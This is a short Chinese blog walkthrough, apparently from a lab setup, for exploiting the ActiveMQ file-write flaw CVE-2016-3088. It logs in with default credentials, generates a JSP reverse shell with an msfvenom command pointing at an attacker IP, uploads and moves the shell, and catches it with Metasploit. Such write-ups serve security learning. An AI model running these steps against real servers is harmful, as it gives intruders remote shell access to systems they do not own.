ActiveMQ 任意文件写入漏洞(CVE-2016-3088)

Created at 2019-07-01 Updated at 2019-08-15 Category 漏洞渗透 Tag ActiveMQ 任意文件写入漏洞(CVE-2016-3088)


ActiveMQ 任意文件写入漏洞(CVE-2016-3088)

写 shell 的话,需要写在 admin 或者 api 中,也就是需要登录,没有密码的话完成不了写 shell 操作。
该环境默认的口令为 admin/admin。
访问 http://127.0.0.1:8161/admin/test/systemProperties.jsp

2.上传 jsp 小马,返回204,但是在 fileserver 路径下不解析
本人用msf生成的
msfvenom -p java/jsp_shell_reverse_tcp lhost=192.168.199.117 lport=9999 R >shell.jsp
mESrtA.png
访问这个网址,用burp拦截
mESh7Q.png
把生成的木马内容放到拦截的内容下,上传成功会显示204(如图)

mEpC1x.png

mEpMgP.png
然后访问如图IP,看成功没
mEp6UJ.png
然后移动到 api 目录下,成功的话,返回 204 No Content
mEpfv6.png
然后访问看有没有成功,然后点击,kali进行监听
mEpTVe.png
添加监听模块和payload
mE9C5j.png
添加端口和自己IP
mE9Ax0.png
开始监听,可以输入命令就成功了
mE9JsK.png

Site by csy using Hexo & Random

Hide